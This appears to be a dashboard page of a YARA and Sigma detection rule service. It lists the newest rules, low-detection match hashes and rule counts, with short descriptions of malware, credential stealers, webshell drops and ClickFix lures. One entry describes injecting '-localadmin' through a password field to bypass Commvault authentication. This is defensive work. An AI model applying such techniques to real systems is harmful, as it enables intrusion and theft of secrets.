currently serving 23279 YARA rules and 4312 Sigma rules
API Key
New Rules per Day
Newest YARA Rules
This table shows the newest additions to the YARA rule set
Rule
Description
Date
Ref
SUSP_NPM_SupplyChain_Attack_PreInstallScript_Nov25
Detects suspicious preinstall script in package.json
25.11.2025
SUSP_NPM_SupplyChain_Attack_PostInstallScript_Nov25_2
Detects suspicious postinstall script in package.json
25.11.2025
SUSP_JS_NPM_SetupScript_Nov25
Detects suspicious JavaScript which exits silently and checks operating system
24.11.2025
MAL_NPM_SupplyChain_Attack_PreInstallScript_Nov25
Detects known malicious preinstall script in package.json
24.11.2025
MAL_APT_BADAUDIO_APT24_Nov25
Detects BADAUDIO malware observed to be used by China-linked APT24
21.11.2025
MAL_APT_Mustang_Panda_Loader_Nov25
Detects .NET based loader observed to be used by APT Mustang Panda
20.11.2025
MAL_Lockbit_Loader_Nov25
Detects a loader used to load Lockbit ransomware
20.11.2025
HKTL_POC_CopyReadProcessMemory_ShellCode_Loader_Nov25
Detects shell code loader POC - CopyReadProcessMemory
19.11.2025
HKTL_ShellCode_Loaders_Nov25
Detects shell code loader indicators often found in Rust based loaders
19.11.2025
SUSP_Loader_Indicators_Nov25
Detects indicators often found in malicious loaders
19.11.2025
SUSP_Donut_Loader_Indicators_Nov25
Detects Donut loader code overlaps
19.11.2025
SUSP_HTKL_Rust_ShellCode_Loader_Nov25
Detects indicators often found in Rust based shellcode loaders
19.11.2025
MAL_UDPGangster_Backdoor_Nov25
Detects UDPGangster backdoor that persists via User Shell Folder Startup modification, copies itself, loads a local or embedded C2 config, exfiltrates system information, and supports remote command execution including shell access, file collection, file delivery, and hibernation, seen being used by MuddyWater APT group
18.11.2025
MAL_Loader_Nov25_1
Detects a loader, seen being used to load UDPGangster backdoor, seen being used by MuddyWater APT group
18.11.2025
MAL_Kalim_Backdoor_Nov25
Detects Kalim backdoor that establishes persistence through scheduled tasks, performs Base64 encoding of Unicode strings, processes SSL/TLS certificates, decrypts payloads, retrieves commands from a remote C2 server, and executes downloaded payloads, seen being used by MuddyWater APT group
18.11.2025
MAL_PNG_ShellCode_Encoder_Nov25
Detects PNG shellcode encoder tool used to encode shellcode into PNG images for stealthy delivery
17.11.2025
MAL_NET_AsyncRAT_Nov25
Detects AsyncRAT an open source remote access tool used by various threat actors.
17.11.2025
SUSP_Common_Malware_Indicators_Nov25
Detects common indicators found in malware like AsyncRAT, VenomRAT etc.
17.11.2025
MAL_LNK_WebDAV_Code_Execution_Nov25
Detects suspicious LNK files that may facilitate arbritrary code execution through WebDAV manipulation similar to CVE-2025-33053.
17.11.2025
SUSP_OBF_NET_Custom_Obfuscator_Nov25
Detects .NET binaries packed with a custom obfuscator obvserved to be used by different threat actors.
17.11.2025
MAL_Lumma_Stealer_Nov25
Detects Lumma stealer an information stealer targetting crypto wallets, browser data and various credentials. Lumma can also load and execute additional payloads from its C2.
17.11.2025
SUSP_PY_Loader_Indicators_Nov25
Detects suspicious Python code patterns often used in loaders
15.11.2025
SUSP_PY_Loader_Capabilities_Nov25
Detects suspicious Python function combinations often used in loaders
15.11.2025
MAL_Go_DocStealer_Nov25
Detects DocStealer - a Go-based malware that steals documents and exfiltrates them via Telegram
14.11.2025
SUSP_Go_Malware_Indicators_Nov25
Detects characteristics of Go-based malware by looking for function names often found in malicious Go binaries
14.11.2025
PUA_PDQ_Connect_Agent_Nov25
Detects PDQ Connect Agent remote management tool that may be abused by threat actors. This legitimate remote administration software is sometimes leveraged by attackers for unauthorized remote access. Requires additional context verification to distinguish between legitimate administrative use and malicious activity.
13.11.2025
Successful YARA Rules in Set
This table shows statistics of the best rules with lowest AV detection rates (rules created in the last 12 months, matches of the last 14 days)
Rule
Average AV Detection Rate
Sample Count
Info
VT
Latest YARA Matches with Low AV Detection Rate
This table lists the last matches with low AV detection rates (between 0 and 15 AV engines matched)
Rule
AVs
Hash
VT
SUSP_Encoded_Net_ServicePointManager
7
91d7ef33256ab18f6de4297af0984da93db4dd9fae169ac731493d687180909a
PUA_ConnectWise_ScreenConnect_Mar23
3
e3274a6266bba0e8d35d0bed0a49dd22f70199e48473b6dcd866fbb803dd495a
SUSP_EXPL_ShellCode_Loader_Nov22_1
12
f38a4f51c9eb6a6c8550568f71ce44bee8366d52c221c80a3f227ddb54e1ad61
HKTL_PUA_FRP_FastReverseProxy_Oct21_1
12
7642cb5820fab0ddb29ec6b97237e9d5e78e11a36d13865d91c4e70053d4cb55
HKTL_PUA_FRP_FastReverseProxy_Jan22_1
12
7642cb5820fab0ddb29ec6b97237e9d5e78e11a36d13865d91c4e70053d4cb55
SUSP_EXPL_ShellCode_Loader_Nov22_1
12
edc999508620841740a78b561ef23c288e8e0cd5b0fbd5ca6cc5e22ebc40fa8e
SUSP_Encoded_GetCurrentThreadId_Ext1_Aug20
5
682a2107e5a00e5b8cb152c4a88a2009ad421707ab67032a1c417018af27c56f
SUSP_Encoded_GetCurrentThreadId_FileOnly
5
682a2107e5a00e5b8cb152c4a88a2009ad421707ab67032a1c417018af27c56f
SUSP_WEBSHELL_JPEG_PHP_Code_Dec20_1
2
6d0c6c688bc79fa926f15c901df1d7c51784fa15e1199f891021c71552f765e8
HKTL_PUA_FRP_FastReverseProxy_Jan22_1
8
83a89a041494c8c08dfd3a8de646410610c37fbd2114188905cd7eefd16d346d
HKTL_PUA_FRP_FastReverseProxy_Oct21_1
8
83a89a041494c8c08dfd3a8de646410610c37fbd2114188905cd7eefd16d346d
YARA Rules Per Category
This list shows the number of YARA rules in the subscribable categories (categories overlap as a rule can be in 'n' categories)
Tag
Count
Malware
7247
Threat Hunting (not subscribable, only in THOR scanner)
5684
APT
5036
Hacktools
4766
Webshells
2395
Exploits
700
Newest Sigma Rules
This table shows the newest additions to the Sigma rule set
Rule
Description
Date
Ref
Info
Suspicious Space Characters in RunMRU Registry Path - ClickFix
Detects the occurrence of numerous space characters in RunMRU registry paths, which may indicate execution via phishing lures using clickfix techniques to hide malicious commands in the Windows Run dialog box from naked eyes.
04.11.2025
Suspicious Space Characters in TypedPaths Registry Path - FileFix
Detects the occurrence of numerous space characters in TypedPaths registry paths, which may indicate execution via phishing lures using file-fix techniques to hide malicious commands.
04.11.2025
Suspicious Explorer Process with Whitespace Padding - ClickFix/FileFix
Detects process creation with suspicious whitespace padding followed by a '#' character, which may indicate ClickFix or FileFix techniques used to conceal malicious commands from visual inspection.
ClickFix and FileFix are social engineering attack techniques where adversaries distribute phishing documents or malicious links that deceive users into opening the Windows Run dialog box or File Explorer search bar.
The victims are then instructed to paste commands from their clipboard, which contain extensive whitespace padding using various Unicode space characters to push the actual malicious command far to the right, effectively hiding it from immediate view.
04.11.2025
FortiGate - New Administrator Account Created
Detects the creation of an administrator account on a Fortinet FortiGate Firewall.
01.11.2025
FortiGate - Firewall Address Object Added
Detects the addition of firewall address objects on a Fortinet FortiGate Firewall.
01.11.2025
FortiGate - New Firewall Policy Added
Detects the addition of a new firewall policy on a Fortinet FortiGate Firewall.
01.11.2025
FortiGate - New Local User Created
Detects the creation of a new local user on a Fortinet FortiGate Firewall.
The new local user could be used for VPN connections.
01.11.2025
FortiGate - New VPN SSL Web Portal Added
Detects the addition of a VPN SSL Web Portal on a Fortinet FortiGate Firewall.
This behavior was observed in pair with modification of VPN SSL settings.
01.11.2025
FortiGate - User Group Modified
Detects the modification of a user group on a Fortinet FortiGate Firewall.
The group could be used to grant VPN access to a network.
01.11.2025
FortiGate - VPN SSL Settings Modified
Detects the modification of VPN SSL Settings (for example, the modification of authentication rules).
This behavior was observed in pair with the addition of a VPN SSL Web Portal.
01.11.2025
Exploitation Activity of CVE-2025-59287 - WSUS Suspicious Child Process
Detects the creation of command-line interpreters (cmd.exe, powershell.exe) as child processes of Windows Server Update Services (WSUS) related process wsusservice.exe.
This behavior is a key indicator of exploitation for the critical remote code execution vulnerability such as CVE-2025-59287, where attackers spawn shells to conduct reconnaissance and further post-exploitation activities.
31.10.2025
Exploitation Activity of CVE-2025-59287 - WSUS Deserialization
Detects cast exceptions in Windows Server Update Services (WSUS) application logs that highly indicate exploitation attempts of CVE-2025-59287, a deserialization vulnerability in WSUS.
31.10.2025
WFP Filter Added via Registry
Detects registry modifications that add Windows Filtering Platform (WFP) filters, which may be used to block security tools and EDR agents from reporting events.
23.10.2025
Suspicious Speech Runtime Binary Child Process
Detects suspicious Speech Runtime Binary Execution by monitoring its child processes.
Child processes spawned by SpeechRuntime.exe could indicate an attempt for lateral movement via COM & DCOM hijacking.
23.10.2025
Winrs Local Command Execution
Detects the execution of Winrs.exe where it is used to execute commands locally.
Commands executed this way are launched under Winrshost.exe and can represent proxy execution used for defense evasion or lateral movement.
22.10.2025
Potential Lateral Movement via Windows Remote Shell
Detects a child process spawned by 'winrshost.exe', which suggests remote command execution through Windows Remote Shell (WinRs) and may indicate potential lateral movement activity.
22.10.2025
Scheduled Task Creation via PowerShell Schedule.Service COM Object
Detects PowerShell execution using the Schedule.Service COM object to create scheduled tasks.
There are straightforward methods to create scheduled tasks using built-in Windows tools such as schtasks.exe or PowerShell cmdlets like New-ScheduledTask.
However, threat actors may leverage alternatice method such as the Schedule.Service COM object to create scheduled tasks to bypass detection.
21.10.2025
PUA - AWS TruffleHog Execution
Detects the execution of TruffleHog, a popular open-source tool used for scanning repositories for secrets and sensitive information, within an AWS environment.
It has been reported to be used by threat actors for credential harvesting. All detections should be investigated to determine if the usage is authorized by security teams or potentially malicious.
21.10.2025
Suspicious File Write to Webapps Root Directory
Detects suspicious file writes to the root directory of web applications, particularly Apache web servers or Tomcat servers.
This may indicate an attempt to deploy malicious files such as web shells or other unauthorized scripts.
20.10.2025
Commvault QLogin with PublicSharingUser and GUID Password (CVE-2025-57788)
Detects a qlogin.exe command attempting to authenticate as the internal `_+_PublicSharingUser_` using a GUID as the password.
This could be an indicator of an attacker exploiting CVE-2025-57788 to gain initial access using leaked credentials.
20.10.2025
Commvault QOperation Path Traversal Webshell Drop (CVE-2025-57790)
Detects the use of qoperation.exe with the -file argument to write a JSP file to the webroot, indicating a webshell drop.
This is a post-authentication step corresponding to CVE-2025-57790.
20.10.2025
Commvault QLogin Argument Injection Authentication Bypass (CVE-2025-57791)
Detects the use of argument injection in the Commvault qlogin command - potential exploitation for CVE-2025-57791.
An attacker can inject the `-localadmin` parameter via the password field to bypass authentication and gain a privileged token.
20.10.2025
Unsigned or Unencrypted SMB Connection to Share Established
Detects SMB server connections to shares without signing or encryption enabled.
This could indicate potential lateral movement activity using unsecured SMB shares.
19.10.2025
ISATAP Router Address Was Set
Detects the configuration of a new ISATAP router on a Windows host. While ISATAP is a legitimate Microsoft technology for IPv6 transition, unexpected or unauthorized ISATAP router configurations could indicate a potential IPv6 DNS Takeover attack using tools like mitm6.
In such attacks, adversaries advertise themselves as DHCPv6 servers and set malicious ISATAP routers to intercept traffic.
This detection should be correlated with network baselines and known legitimate ISATAP deployments in your environment.
19.10.2025
AWS Bucket Deleted
Detects the deletion of S3 buckets in AWS CloudTrail logs.
Monitoring the deletion of S3 buckets is critical for security and data integrity, as it may indicate potential data loss or unauthorized access attempts.
19.10.2025
AWS ConsoleLogin Failed Authentication
Detects failed AWS console login attempts due to authentication failures. Monitoring these events is crucial for identifying potential brute-force attacks or unauthorized access attempts to AWS accounts.
19.10.2025
AWS EnableRegion Command Monitoring
Detects the use of the EnableRegion command in AWS CloudTrail logs.
While AWS has 30+ regions, some of them are enabled by default, others must be explicitly enabled in each account separately.
There may be situations where security monitoring does not cover some new AWS regions.
Monitoring the EnableRegion command is important for identifying potential persistence mechanisms employed by adversaries, as enabling additional regions can facilitate continued access and operations within an AWS environment.
19.10.2025
AWS VPC Flow Logs Deleted
Detects the deletion of one or more VPC Flow Logs in AWS Elastic Compute Cloud (EC2) through the DeleteFlowLogs API call.
Adversaries may delete flow logs to evade detection or remove evidence of network activity, hindering forensic investigations and visibility into malicious operations.
19.10.2025
File Access Of Signal Desktop Sensitive Data
Detects access to Signal Desktop's sensitive data files: db.sqlite and config.json.
The db.sqlite file in Signal Desktop stores all locally saved messages in an encrypted SQLite database, while the config.json contains the decryption key needed to access that data.
Since the key is stored in plain text, a threat actor who gains access to both files can decrypt and read sensitive messages without needing the users credentials.
Currently the rule only covers the default Signal installation path in AppData\Roaming. Signal Portable installations may use different paths based on user configuration. Additional paths can be added to the selection as needed.
19.10.2025
YARA/SIGMA Rule Count
Rule Type
Community Feed
Nextron Private Feed
Yara
2709
20570
Sigma
3491
821
Sigma Rules Per Category (Community)
Type
Count
windows / process_creation
1309
windows / registry_set
208
windows / file_event
203
windows / ps_script
164
windows / security
159
linux / process_creation
128
windows / image_load
111
webserver
82
windows / system
74
macos / process_creation
68
aws / cloudtrail
54
proxy
53
linux / auditd
53
windows / network_connection
52
azure / activitylogs
42
windows / registry_event
39
azure / auditlogs
38
windows / ps_module
33
windows / application
31
windows / dns_query
25
azure / signinlogs
24
windows / process_access
23
okta / okta
22
azure / riskdetection
19
opencanary / application
18
windows / pipe_created
18
linux
17
rpc_firewall / application
17
github / audit
16
gcp / gcp.audit
16
windows / windefend
16
bitbucket / audit
14
windows / file_delete
13
m365 / threat_management
13
linux / file_event
12
cisco / aaa
12
windows / create_remote_thread
12
windows / driver_load
10
kubernetes / application / audit
10
windows / codeintegrity-operational
10
windows / create_stream_hash
9
windows / registry_add
9
windows / registry_delete
9
windows / ps_classic_start
9
dns
9
windows / firewall-as
8
windows / msexchange-management
8
fortigate / event
7
windows / appxdeployment-server
7
windows / file_access
7
azure / pim
7
windows / bits-client
7
gcp / google_workspace.admin
7
zeek / smb_files
7
antivirus
7
windows / dns-client
6
jvm / application
5
kubernetes / audit
5
zeek / dns
5
linux / network_connection
5
zeek / http
5
zeek / dce_rpc
4
windows / sysmon
4
windows / taskscheduler
4
windows / iis-configuration
4
windows / ntlm
3
linux / sshd
3
m365 / audit
3
windows / wmi_event
3
windows / powershell-classic
3
firewall
2
linux / syslog
2
windows / file_change
2
windows / security-mitigations
2
windows / dns-server
2
macos / file_event
2
spring / application
2
apache
2
onelogin / onelogin.events
2
windows / lsa-server
1
windows / printservice-operational
1
database
1
linux / clamav
1
linux / auth
1
linux / guacamole
1
windows / applocker
1
windows / openssh
1
django / application
1
fortios / sslvpnd
1
linux / cron
1
juniper / bgp
1
windows / appmodel-runtime
1
windows / process_tampering
1
cisco / syslog
1
huawei / bgp
1
windows / appxpackaging-om
1
windows / smbserver-connectivity
1
windows / smbclient-connectivity
1
windows / capi2
1
windows / shell-core
1
windows / raw_access_thread
1
paloalto / file_event / globalprotect
1
linux / vsftpd
1
zeek / x509
1
windows / certificateservicesclient-lifecycle-system
1
nodejs / application
1
paloalto / appliance / globalprotect
1
windows / smbclient-security
1
windows / diagnosis-scripted
1
windows / microsoft-servicebus-client
1
windows / file_executable_detected
1
python / application
1
windows / file_rename
1
windows / sysmon_status
1
m365 / exchange
1
zeek / rdp
1
windows / terminalservices-localsessionmanager
1
ruby_on_rails / application
1
m365 / threat_detection
1
zeek / kerberos
1
windows / driver-framework
1
windows / sysmon_error
1
windows
1
sql / application
1
cisco / duo
1
linux / sudo
1
velocity / application
1
cisco / bgp
1
nginx
1
windows / ldap
1
windows / wmi
1
windows / dns-server-analytic
1
cisco / ldp
1
windows / ps_classic_provider_start
1
windows / printservice-admin
1
Sigma Rules Per Category (Nextron Private Feed)
Type
Count
windows / process_creation
389
windows / registry_set
78
windows / ps_script
75
windows / image_load
43
windows / file_event
38
linux / process_creation
34
windows / wmi
29
windows / security
22
proxy
12
windows / system
9
windows / registry_event
8
windows / network_connection
8
windows / kernel-event-tracing
6
windows / ps_module
5
windows / ntfs
5
windows / sense
4
windows / taskscheduler
4
windows / create_remote_thread
4
windows / registry_delete
4
windows / pipe_created
4
windows / ps_classic_script
3
windows / vhd
3
webserver
3
windows / application-experience
3
windows / driver_load
3
windows / hyper-v-worker
3
windows / process_access
2
windows / windefend
2
windows / bits-client
2
windows / codeintegrity-operational
2
windows / kernel-shimengine
2
macos / process_creation
1
windows / amsi
1
windows / process-creation
1
windows / audit-cve
1
windows / file_delete
1
windows / file_access
1
windows / registry-setinformation
1
windows / firewall-as
1
linux / file_event
1
windows / application
1
windows / dns_query
1
windows / file_rename
1
Tenable Nessus
Requirement: Privileged Scan
- YARA Scanning with Nessus works only when scanning with credentials (privileged scan)
YARA Scanning with Nessus
- You can only upload a single .yar file
- Filesystem scan has to be activated
- You have to define the target locations
- The Nessus plugin ID will be 91990
- Only files with the following extensions can be scanned: .application, .asp, .aspx, .bat, .chm, .class, .cmd, .com, .cp, .csh, .dl, .doc, .docx, .drv, .exe, .gadget, .hta, .inf, .ins, .inx, .isu, .jar, .job, .jpeg, .jpg, .js, .jse, .jse, .jsp, .lnk, .msc, .msi, .msp, .mst, .paf, .pdf, .php, .pif, .ppt, .pptx, .ps1, .ps1xm, .ps2, .ps2xm, .psc1, .psc2, .reg, .rgs, .scf, .scr, .sct, .shb, .shs, .swf, .sys, .u3p, .vb, .vbe, .vbs, .vbscript, .ws, .wsf, .xls, .xls
Carbon Black
Tutorial: https://github.com/carbonblack/cb-yara-connectorFireEye EX
Tutorial: https://www.fireeye.com/blog/products-and-services/2018/12/detect-and-block-email-threats-with-custom-yara-rules.html
Scan your endpoints, forensic images or collected files with our portable scanner THOR